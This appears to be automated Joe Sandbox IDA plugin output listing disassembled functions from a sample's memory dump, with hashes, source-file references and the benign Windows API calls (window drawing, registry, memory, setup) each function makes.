Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$H_prolog3$DestroyException@8ParentThrow
String ID:
API String ID: 3096848108-0
Opcode ID: 2216db2b90e54c17255570fd0696e4c4bd2e95ba71ec54c9712047fe5ed964a6
Instruction ID: 5020bb4da944d1e9451266014fd8b93624e10bb01e3b70e76eed0e4bbae020e7
Opcode Fuzzy Hash: 2216db2b90e54c17255570fd0696e4c4bd2e95ba71ec54c9712047fe5ed964a6
Instruction Fuzzy Hash: A741DF359602158FCF22AFA4C8856EDFBF2BF68300F35415AE8957B251CB309D918B90

Function 0020CCD8 Relevance: 9.1, APIs: 6, Instructions: 95windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0020CD09
OffsetRect.USER32(?,?,?), ref: 0020CD27
SendMessageW.USER32(00000000,0000000B,00000000,00000000), ref: 0020CD34
IsWindowVisible.USER32(?), ref: 0020CD3D
SendMessageW.USER32(00000014,0000000B,00000001,00000000), ref: 0020CDB0
RedrawWindow.USER32(00000105,00000000,00000000,00000105), ref: 0020CDC0

Part of subcall function 001DCDE7: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,001D8A00,?,001D8A00,00000000,?,?,000000FF,000000FF,00000015), ref: 001DCE0F

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$MessageRectSend$OffsetRedrawVisible
String ID:
API String ID: 2707749077-0
Opcode ID: 1475cbf73ad4bd918f5f86e6c9fd81892071da3fd328d2b3043b84736a1ecbce
Instruction ID: 8a960dd6f25f42c242d7d00dcfdddbce664e3e805f52d726af00a84e38458186
Opcode Fuzzy Hash: 1475cbf73ad4bd918f5f86e6c9fd81892071da3fd328d2b3043b84736a1ecbce
Instruction Fuzzy Hash: 95312FB1910209BFDB11DFA4CD89EBFBBBDFB48300F100929B556A6291DB70AD109F60

Function 00232D0B Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

PatBlt.GDI32(00000000,00000000,001F80B7,000000C6,00FF0062,00000000), ref: 00232D32
SetBkColor.GDI32(00F0F0F0), ref: 00232D55
BitBlt.GDI32(00000000,00000000,001F80B9,000000C8,00000000,00000000,00CC0020), ref: 00232D83
SetBkColor.GDI32 ref: 00232D96
BitBlt.GDI32(00000000,00000000,001F80B9,000000C8,00000000,00000000,00EE0086), ref: 00232DBE
BitBlt.GDI32(00000000,00000001,00000001,001F80BA,000000C9,00000000,00000000,00000000,008800C6), ref: 00232DE1

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Color
String ID:
API String ID: 2811717613-0
Opcode ID: c41a42ae7079ee21f3d634d3b4157bbf9dc5369e53b4df1e5d1c53496d8ac943
Instruction ID: e218a6cfb5cd18d4c6c2798420f5cecc171ca6d1abeeb94251d52b9844461d0f
Opcode Fuzzy Hash: c41a42ae7079ee21f3d634d3b4157bbf9dc5369e53b4df1e5d1c53496d8ac943
Instruction Fuzzy Hash: A3215CB2200608FFE72A8F55EDC6D77B7ADEB48358F004519F24686170C6B1AC549F20

Function 0020DFBB Relevance: 9.1, APIs: 6, Instructions: 79timeCOMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 0020DFDB
ReleaseCapture.USER32 ref: 0020DFE9
PtInRect.USER32(?,?,?), ref: 0020E03B
InvalidateRect.USER32(?,?,00000001), ref: 0020E089
SetTimer.USER32(?,00000002,00000050,00000000), ref: 0020E0AB

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$CaptureInvalidateReleaseTimer
String ID:
API String ID: 2903485716-0
Opcode ID: 72808eae87f1258628a7fbe98ab06b87ae974f0678f86c036bce549a5697f18f
Instruction ID: d4ba77c44aed3a427ff1e65c3c90c4e0eb7ce78aa552fa8e890990259bef3079
Opcode Fuzzy Hash: 72808eae87f1258628a7fbe98ab06b87ae974f0678f86c036bce549a5697f18f
Instruction Fuzzy Hash: 22216F32250747DBCF314F20CC88FAA77B6FF44391F150829F5AAA61D1DBB199919B90

Function 00235A69 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?,?,?,?,?,00235BB2,00000000,00000000,?,?,002379C6,?,?,00000084,00237D9A), ref: 00235A79
GlobalLock.KERNEL32(00000000), ref: 00235A91
_memmove.LIBCMT ref: 00235A9E
CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000,?), ref: 00235AAD
EnterCriticalSection.KERNEL32(00336BF4,00000000), ref: 00235AC6
LeaveCriticalSection.KERNEL32(00336BF4), ref: 00235B2D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Global$CriticalSection$AllocCreateEnterLeaveLockStream_memmove
String ID:
API String ID: 861836607-0
Opcode ID: b95774e080548eaa657a4d24e605d960734d1cf063ab25a9838aa62628583381
Instruction ID: 44551eccad8631c645a3e07dac7b148ba35a2093ffa9e2d7191b12e51be880b8
Opcode Fuzzy Hash: b95774e080548eaa657a4d24e605d960734d1cf063ab25a9838aa62628583381
Instruction Fuzzy Hash: 0F21A1B5610616BFCB11AF61ECD9B6E7BACEB14745F004129F809DA251EF30DD10DB60

Function 00215F25 Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00215F2C
GetDesktopWindow.USER32 ref: 00215F3A

Part of subcall function 001D0431: __EH_prolog3.LIBCMT ref: 001D0438
Part of subcall function 001D0431: GetWindowDC.USER32(00000000,00000004,001CE19D,00000000,?,?,002F5254), ref: 001D0464

SetRectEmpty.USER32(?), ref: 00215F71
SetRectEmpty.USER32(?), ref: 00215F83
CopyRect.USER32(?,?), ref: 00215F8E
CopyRect.USER32(?,?), ref: 00215FAA

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$CopyEmptyWindow$DesktopH_prolog3H_prolog3_
String ID:
API String ID: 2526268198-0
Opcode ID: 361ddd99c328192b5a11df488925e937090012c21dddba5d36505a59ff0661a0
Instruction ID: 169e632a0b43e1bce9ddf71c030c2485939337a8ed8b2bc45e0de9665c75e06f
Opcode Fuzzy Hash: 361ddd99c328192b5a11df488925e937090012c21dddba5d36505a59ff0661a0
Instruction Fuzzy Hash: 612195B2C1061D9ACF01DFD4DC849EEBBB9BF19305F54442AEA09BB150D7756A06CB60

Function 001D4CAE Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 001D4CE1
GetParent.USER32(?), ref: 001D4CEF
GetParent.USER32(?), ref: 001D4D02
GetLastActivePopup.USER32(?), ref: 001D4D13
IsWindowEnabled.USER32(?), ref: 001D4D27
EnableWindow.USER32(?,00000000), ref: 001D4D3A

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: d2c1a40b11d1601c949cdcc1d94fa9a813d2befaa01dcf7e5375f2089ff64dde
Instruction ID: 3d72bb6fd46f93923429bd726551b545cc35cfbbf3bfcc4458ff4a1d4c8ad898
Opcode Fuzzy Hash: d2c1a40b11d1601c949cdcc1d94fa9a813d2befaa01dcf7e5375f2089ff64dde
Instruction Fuzzy Hash: 7A11EC33643A3157DB311B9D9C84B6AB39D9F64B61F164157ED48EB304CB34CC0082E1

Function 002066C7 Relevance: 9.1, APIs: 6, Instructions: 65COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 002066D3
GetWindow.USER32(00000000), ref: 002066DA
GetWindowLongW.USER32(00000000,000000F0), ref: 00206716
ShowWindow.USER32(00000000,00000000,?,?,?,?,00207F19,00000001), ref: 00206731
ShowWindow.USER32(00000000,00000004,?,?,?,?,?,?,?,?,?,?,?,00207F19,00000001), ref: 00206755
GetWindow.USER32(00000000,00000002), ref: 0020675E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: 91c233afbab342a3475de1643787a91e09f28b41c74434183681af6c356f277e
Instruction ID: 4a004d8378c510f9302bfa1c4322c4e0a5c30b012a0eea9461685c68daffc84b
Opcode Fuzzy Hash: 91c233afbab342a3475de1643787a91e09f28b41c74434183681af6c356f277e
Instruction Fuzzy Hash: 8A110E31450782ABC7218B288CDDF3FB6A9EB80B68F240188F545962E2CFB8CC60C610

Function 001D43B1 Relevance: 9.1, APIs: 6, Instructions: 62registryCOMMON

Download Yara Rule

APIs

RegDeleteKeyW.ADVAPI32(00000000,?), ref: 001D43D9
RegDeleteValueW.ADVAPI32(00000000,?), ref: 001D43F8
RegCloseKey.ADVAPI32(00000000), ref: 001D4425

Part of subcall function 001D41A4: RegCloseKey.ADVAPI32(?), ref: 001D4249
Part of subcall function 001D41A4: RegCloseKey.ADVAPI32(?), ref: 001D4253

WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 001D4440

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Close$Delete$PrivateProfileStringValueWrite
String ID:
API String ID: 1330817964-0
Opcode ID: 11a79936dea95babbef8644fbf800bfd805725f106a5e968850a142e1860e3ef
Instruction ID: 706552cd0452d87b23a140286fc76d4c05a4e1e1ca23d200b296bf2937907a71
Opcode Fuzzy Hash: 11a79936dea95babbef8644fbf800bfd805725f106a5e968850a142e1860e3ef
Instruction Fuzzy Hash: 62117333400165FFCF216FA4ECC8DAE3B6AFF483657058436F6595A121C7728961DB61

Function 001D0FBC Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 001D0FD8
GetDlgCtrlID.USER32(00000000), ref: 001D0FE9
GetWindowLongW.USER32(00000000,000000F0), ref: 001D0FF9
GetWindowRect.USER32(00000000,00000000), ref: 001D101B
PtInRect.USER32(00000000,00000000,00000000), ref: 001D102B
GetWindow.USER32(?,00000005), ref: 001D1038

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 5419d924175e8ca43f51d42d1a803e63dd9ca7e3fa100f959212955f674024e9
Instruction ID: b8407c3b0188dae91d62a5ad388c518bdb7a1e0faab99e2dd93d7f81733bd6c3
Opcode Fuzzy Hash: 5419d924175e8ca43f51d42d1a803e63dd9ca7e3fa100f959212955f674024e9
Instruction Fuzzy Hash: E311AC36940159BBDB11AF94DC48BEEB3B8EF15362F214016F905A6190CB34AE418BA1

Function 001D1116 Relevance: 9.1, APIs: 6, Instructions: 52windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 001D111C
GetParent.USER32(00000000), ref: 001D1144

Part of subcall function 001D0F09: GetWindowLongW.USER32(?,000000F0), ref: 001D0F2A
Part of subcall function 001D0F09: GetClassNameW.USER32(?,?,0000000A), ref: 001D0F3F
Part of subcall function 001D0F09: CompareStringW.KERNEL32(00000409,00000001,?,000000FF,combobox,000000FF), ref: 001D0F59

GetWindowLongW.USER32(?,000000F0), ref: 001D115F
GetParent.USER32(?), ref: 001D116D
GetDesktopWindow.USER32 ref: 001D1171
SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 001D1185

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$LongParent$ClassCompareDesktopFocusMessageNameSendString
String ID:
API String ID: 1233893325-0
Opcode ID: fd7aec7d7d62c7bcec58affd43f8270f540287db5ef0c029059650c922ae762b
Instruction ID: bd8eef434ac675661634ac3143e8e7e9c8be8ad15817c4a4a0153494d4527741
Opcode Fuzzy Hash: fd7aec7d7d62c7bcec58affd43f8270f540287db5ef0c029059650c922ae762b
Instruction Fuzzy Hash: 2601863224435177D72127766CC9F6A756D9B89B50F294527FB08A7380DF64DC018164

Function 002C53DA Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 002C53E6

Part of subcall function 002C5DC1: __getptd_noexit.LIBCMT ref: 002C5DC4
Part of subcall function 002C5DC1: __amsg_exit.LIBCMT ref: 002C5DD1

__amsg_exit.LIBCMT ref: 002C5406
__lock.LIBCMT ref: 002C5416
InterlockedDecrement.KERNEL32(?), ref: 002C5433
_free.LIBCMT ref: 002C5446
InterlockedIncrement.KERNEL32(02B72CE0), ref: 002C545E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: c73d159461429f4b5d867d8c0e4278131b62f0a5339d5d50d4eb305e22bb516a
Instruction ID: 9869528f91b77cc5be58b031d45e6bf3fd3c05e9062e05c77d0b6f9d4b1ad04b
Opcode Fuzzy Hash: c73d159461429f4b5d867d8c0e4278131b62f0a5339d5d50d4eb305e22bb516a
Instruction Fuzzy Hash: EA01C832961A3297CB35AF549845F9E77A06F00751F084219E8046B291CB34F9E1CFE1

Function 001DC767 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 243COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 001DC797

Strings

@, xrefs: 001DC8A3
AfxMDIFrame100su, xrefs: 001DC838
@, xrefs: 001DC93C
AfxFrameOrView100su, xrefs: 001DC85D

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView100su$AfxMDIFrame100su
API String ID: 2102423945-2639805938
Opcode ID: 6eff4c09966c29477085905c5132b50a6fe86f79f2557c7dcd913b0864d861df
Instruction ID: 4f3940b96fd4e19e7f470a724f42a6ff8eca7031a0ae434ec7cb98bda2d63fab
Opcode Fuzzy Hash: 6eff4c09966c29477085905c5132b50a6fe86f79f2557c7dcd913b0864d861df
Instruction Fuzzy Hash: 97912372C00219AADB50DFE8D585BDEBBF8AF44344F108566F908E7281EB749B45DBE0

Function 001C22C0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 222COMMON

Download Yara Rule

APIs

SetupFindFirstLineW.SETUPAPI(?,?,00000000,0000002C,00312A58,6B722804,00312A58,00000000), ref: 001C2315
SetupFindNextLine.SETUPAPI(0000002C,-00000030), ref: 001C23B0
SetupFindNextLine.SETUPAPI(0000002C,-00000030), ref: 001C244A

Strings

VID_1782, xrefs: 001C2362, 001C23E7
VID_0525, xrefs: 001C2389, 001C240E

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: FindLineSetup$Next$First
String ID: VID_0525$VID_1782
API String ID: 1432318419-2521349241
Opcode ID: d7b06763e537fd83f4b41b2d194c4afb13f90ae6e553f53edc4e6328070bdc7e
Instruction ID: 26baea7234dd58a1f035cf2f8e86a65796151849df6e60e37f7bb970593ee1b5
Opcode Fuzzy Hash: d7b06763e537fd83f4b41b2d194c4afb13f90ae6e553f53edc4e6328070bdc7e
Instruction Fuzzy Hash: 38815971A006469FCB18CFA8CC91FAEB3A5FB69324B24876DE425D72D1DB35E901CB50

Function 001F96FE Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 197windowCOMMON

Download Yara Rule

APIs

IsRectEmpty.USER32(?), ref: 001F98D3
IsWindowVisible.USER32(?), ref: 001F991E

Strings

2, xrefs: 001F9810
2, xrefs: 001F974F
D2, xrefs: 001F9724

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyRectVisibleWindow
String ID: D2$2$2
API String ID: 3084472430-1793331178
Opcode ID: 5d3b473982ff1ac96c0ebbdc4b1bfc575f03b3eeebe289660d34516583bdc36c
Instruction ID: 654512841f6e433160ebd2c6a2f508fa2e613456f72e43bb47740f29d9ca46d6
Opcode Fuzzy Hash: 5d3b473982ff1ac96c0ebbdc4b1bfc575f03b3eeebe289660d34516583bdc36c
Instruction Fuzzy Hash: 23715B30A102099FDB15EFA5C889BBEB7F9AF49304F1500B9EA45EB291DB719C41CF91

Function 001EDBB8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,00000000,000000F1), ref: 001EDBE2

Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22

LoadResource.KERNEL32(?,00000000), ref: 001EDBF5
LockResource.KERNEL32(00000000), ref: 001EDC03
FreeResource.KERNEL32(?), ref: 001EDDA7

Strings

DR/, xrefs: 001EDCD9

Memory Dump Source

Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
